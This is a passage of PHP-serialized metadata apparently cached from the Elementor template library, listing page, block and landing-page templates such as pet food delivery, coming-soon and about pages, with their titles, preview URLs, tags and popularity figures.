Portfolio\",\"Design\",\"Designer\",\"Interior Design\",\"Portfolio\",\"Project\"]\";s:10:\"menu_order\";i:40;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:280;a:21:{s:4:\"tmpl\";i:1148;s:2:\"id\";i:16960;s:5:\"title\";s:44:\"Dog & Cat Food Delivery – Business\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2021/01/Dog-Food.png\";s:12:\"tmpl_created\";i:1610533581;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/lp/dog-cat-food-delivery-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:71:\"[\"Business\",\"Cat\",\"Delivery\",\"Dog\",\"Food\",\"Landing Pages\",\"Pet\",\"Pets\"]\";s:10:\"menu_order\";i:41;s:16:\"popularity_index\";i:782;s:11:\"trend_index\";i:510;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:281;a:21:{s:4:\"tmpl\";i:670;s:2:\"id\";i:8525;s:5:\"title\";s:11:\"404 page 08\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/008.jpg\";s:12:\"tmpl_created\";i:1526415374;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-08/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:41;s:16:\"popularity_index\";i:510;s:11:\"trend_index\";i:575;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:282;a:21:{s:4:\"tmpl\";i:1251;s:2:\"id\";i:22143;s:5:\"title\";s:33:\"Fashion Store – Coming Soon\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/05/Library-Pic-Fashion-Store.png\";s:12:\"tmpl_created\";i:1647177389;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/fashion-store-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:56:\"[\"Coming Soon\",\"Fashion\",\"Landing Pages\",\"Shop\",\"store\"]\";s:10:\"menu_order\";i:41;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:283;a:21:{s:4:\"tmpl\";i:1155;s:2:\"id\";i:17095;s:5:\"title\";s:36:\"Mobile Pet Grooming – Business\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2021/01/Mobile-Pet-Grooming.png\";s:12:\"tmpl_created\";i:1610632115;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/lp/mobile-pet-grooming-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:38:\"[\"Dog\",\"Groom\",\"Landing Pages\",\"Pets\"]\";s:10:\"menu_order\";i:42;s:16:\"popularity_index\";i:786;s:11:\"trend_index\";i:731;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:284;a:21:{s:4:\"tmpl\";i:1241;s:2:\"id\";i:21451;s:5:\"title\";s:26:\"Exhibition – Gallery\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2021/12/21-Gallery-Exhibition.jpg\";s:12:\"tmpl_created\";i:1638821855;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/exhibition-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:74:\"[\"Art\",\"Creative\",\"Creative Portfolio\",\"Exhibition\",\"Gallery\",\"Portfolio\"]\";s:10:\"menu_order\";i:42;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:285;a:21:{s:4:\"tmpl\";i:502;s:2:\"id\";i:5438;s:5:\"title\";s:7:\"About 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_4.png\";s:12:\"tmpl_created\";i:1520443512;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/about-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:42;s:16:\"popularity_index\";i:147;s:11:\"trend_index\";i:9;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:286;a:21:{s:4:\"tmpl\";i:1159;s:2:\"id\";i:17245;s:5:\"title\";s:34:\"Marketing Course – Education\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2021/01/PPC.png\";s:12:\"tmpl_created\";i:1610902958;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/marketing-course-education/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"Education\";s:4:\"tags\";s:45:\"[\"Course Online\",\"Landing Pages\",\"Marketing\"]\";s:10:\"menu_order\";i:43;s:16:\"popularity_index\";i:770;s:11:\"trend_index\";i:430;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:287;a:21:{s:4:\"tmpl\";i:1240;s:2:\"id\";i:21430;s:5:\"title\";s:30:\"Travel Blogger – Gallery\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/12/19-Gallery-Travel-Blogger.jpg\";s:12:\"tmpl_created\";i:1638821592;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/travel-blogger-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:43:\"[\"Gallery\",\"Photography\",\"Slider\",\"Travel\"]\";s:10:\"menu_order\";i:43;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:288;a:21:{s:4:\"tmpl\";i:1149;s:2:\"id\";i:16983;s:5:\"title\";s:41:\"Pilates Instructor – Online Service\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2021/01/Pilates-Instructor.png\";s:12:\"tmpl_created\";i:1610534138;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/lp/pilates-instructor-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:70:\"[\"Free Trial\",\"Instructor\",\"Landing Pages\",\"Online Service\",\"Pilates\"]\";s:10:\"menu_order\";i:44;s:16:\"popularity_index\";i:778;s:11:\"trend_index\";i:412;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:289;a:21:{s:4:\"tmpl\";i:1416;s:2:\"id\";i:24104;s:5:\"title\";s:33:\"Ceramics Shop – Coming Soon\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Ceramics-Shop.jpg\";s:12:\"tmpl_created\";i:1650988949;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/ceramics-shop-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:115:\"[\"Art\",\"Business\",\"Coming Soon\",\"Creative\",\"Decor\",\"Design\",\"Furniture Design\",\"Interior Design\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:44;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:290;a:21:{s:4:\"tmpl\";i:557;s:2:\"id\";i:6135;s:5:\"title\";s:8:\"About 10\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_2.png\";s:12:\"tmpl_created\";i:1520443663;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:45;s:16:\"popularity_index\";i:77;s:11:\"trend_index\";i:47;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:291;a:21:{s:4:\"tmpl\";i:1412;s:2:\"id\";i:24033;s:5:\"title\";s:37:\"Dance Studio – Maintenance Mode\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-Dance-Studio.jpg\";s:12:\"tmpl_created\";i:1649881344;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/dance-studio-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:113:\"[\"Academy\",\"Business\",\"Dance Studio\",\"Form\",\"Pilates\",\"School\",\"Sport\",\"Teacher\",\"Training\",\"Under Construction\"]\";s:10:\"menu_order\";i:45;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:292;a:21:{s:4:\"tmpl\";i:1190;s:2:\"id\";i:18568;s:5:\"title\";s:32:\"Flower Delivery – Business\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2021/04/Flower-Delivery.png\";s:12:\"tmpl_created\";i:1617546716;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/flower-delivery-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:37:\"[\"Delivery\",\"Flower\",\"Landing Pages\"]\";s:10:\"menu_order\";i:45;s:16:\"popularity_index\";i:874;s:11:\"trend_index\";i:763;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:293;a:21:{s:4:\"tmpl\";i:1145;s:2:\"id\";i:16917;s:5:\"title\";s:22:\"Webinar – Events\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2021/01/Webinar-Library-Pic.jpg\";s:12:\"tmpl_created\";i:1610466822;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/lp/webinar-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:36:\"[\"Events\",\"Landing Pages\",\"Webinar\"]\";s:10:\"menu_order\";i:46;s:16:\"popularity_index\";i:821;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:294;a:21:{s:4:\"tmpl\";i:1413;s:2:\"id\";i:24049;s:5:\"title\";s:33:\"ECO Shop – Maintenance Mode\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-ECO-Shop.jpg\";s:12:\"tmpl_created\";i:1649882053;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/eco-shop-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:110:\"[\"Aesthetic\",\"Business\",\"Creative\",\"Decor\",\"Health\",\"Help\",\"Lifestyle\",\"Products\",\"Shop\",\"Under Construction\"]\";s:10:\"menu_order\";i:46;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:295;a:21:{s:4:\"tmpl\";i:497;s:2:\"id\";i:5397;s:5:\"title\";s:8:\"About 11\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_1.png\";s:12:\"tmpl_created\";i:1520443503;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:46;s:16:\"popularity_index\";i:148;s:11:\"trend_index\";i:43;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:296;a:21:{s:4:\"tmpl\";i:1154;s:2:\"id\";i:17079;s:5:\"title\";s:42:\"Calls Volunteer – Social Involvement\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2021/01/Calls-Volunteer.png\";s:12:\"tmpl_created\";i:1610631774;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/lp/calls-volunteer-social-involvement/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Social Involvement\";s:4:\"tags\";s:68:\"[\"Care\",\"Covid-19\",\"Help\",\"Involvement\",\"Landing Pages\",\"Volunteer\"]\";s:10:\"menu_order\";i:47;s:16:\"popularity_index\";i:854;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:297;a:21:{s:4:\"tmpl\";i:1419;s:2:\"id\";i:24136;s:5:\"title\";s:29:\"Food Blog – Coming Soon\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Food-Blog.jpg\";s:12:\"tmpl_created\";i:1650990034;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/food-blog-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:62:\"[\"Blog\",\"Business\",\"Coming Soon\",\"Cooking\",\"Education\",\"Food\"]\";s:10:\"menu_order\";i:47;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:298;a:21:{s:4:\"tmpl\";i:1142;s:2:\"id\";i:16836;s:5:\"title\";s:33:\"Marketing Agency – Business\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/01/Marketing-Agency-Library-Pic.jpg\";s:12:\"tmpl_created\";i:1610464490;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/marketing-agency-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:74:\"[\"Agency\",\"Business\",\"Landing Pages\",\"Marketing\",\"Marketing Landing Page\"]\";s:10:\"menu_order\";i:48;s:16:\"popularity_index\";i:816;s:11:\"trend_index\";i:787;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:299;a:21:{s:4:\"tmpl\";i:1411;s:2:\"id\";i:24020;s:5:\"title\";s:35:\"Mobile App – Maintenance Mode\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-Mobile-App.jpg\";s:12:\"tmpl_created\";i:1649880955;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/mobile-app-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:77:\"[\"App\",\"Business\",\"Coding\",\"Computer\",\"Launch\",\"Mobile\",\"Under Construction\"]\";s:10:\"menu_order\";i:48;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:300;a:21:{s:4:\"tmpl\";i:498;s:2:\"id\";i:5405;s:5:\"title\";s:8:\"About 12\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_1.png\";s:12:\"tmpl_created\";i:1520443505;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:48;s:16:\"popularity_index\";i:216;s:11:\"trend_index\";i:50;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:301;a:21:{s:4:\"tmpl\";i:1139;s:2:\"id\";i:16785;s:5:\"title\";s:42:\"Gym Promotion – Health & Fitness\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2021/01/Gym-LP.jpg\";s:12:\"tmpl_created\";i:1610455496;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/lp/gym-promotion-health-fitness/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Health and Fitness\";s:4:\"tags\";s:42:\"[\"Fitness\",\"Gym\",\"Health\",\"Landing Pages\"]\";s:10:\"menu_order\";i:49;s:16:\"popularity_index\";i:820;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:302;a:21:{s:4:\"tmpl\";i:1420;s:2:\"id\";i:24152;s:5:\"title\";s:32:\"Perfume Shop – Coming Soon\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Perfume-Shop.jpg\";s:12:\"tmpl_created\";i:1650990353;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/perfume-shop-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:68:\"[\"Business\",\"Coming Soon\",\"Cosmetics\",\"Lifestyle\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:49;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:303;a:21:{s:4:\"tmpl\";i:1185;s:2:\"id\";i:18492;s:5:\"title\";s:34:\"Bicycle Pre-Sale – eCommerce\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Bike-Landing-Page.png\";s:12:\"tmpl_created\";i:1617535552;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/bicycle-pre-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:34:\"[\"Bicycle\",\"Landing Pages\",\"Sale\"]\";s:10:\"menu_order\";i:50;s:16:\"popularity_index\";i:871;s:11:\"trend_index\";i:826;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:304;a:21:{s:4:\"tmpl\";i:1418;s:2:\"id\";i:24126;s:5:\"title\";s:28:\"Skincare – Coming Soon\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Skincare.jpg\";s:12:\"tmpl_created\";i:1650989585;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/skincare-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:128:\"[\"Aesthetic\",\"Beauty\",\"Beauty Salon\",\"Business\",\"Coming Soon\",\"Cosmetics\",\"Girly\",\"Lifestyle\",\"Services\",\"Skincare\",\"Treatment\"]\";s:10:\"menu_order\";i:51;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:305;a:21:{s:4:\"tmpl\";i:1181;s:2:\"id\";i:18349;s:5:\"title\";s:39:\"Virtual try-on glasses – Business\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/03/250x280-8.png\";s:12:\"tmpl_created\";i:1614772569;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/lp/virtual-try-on-glasses-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:64:\"[\"Fashion\",\"Glasses\",\"Landing Pages\",\"Online 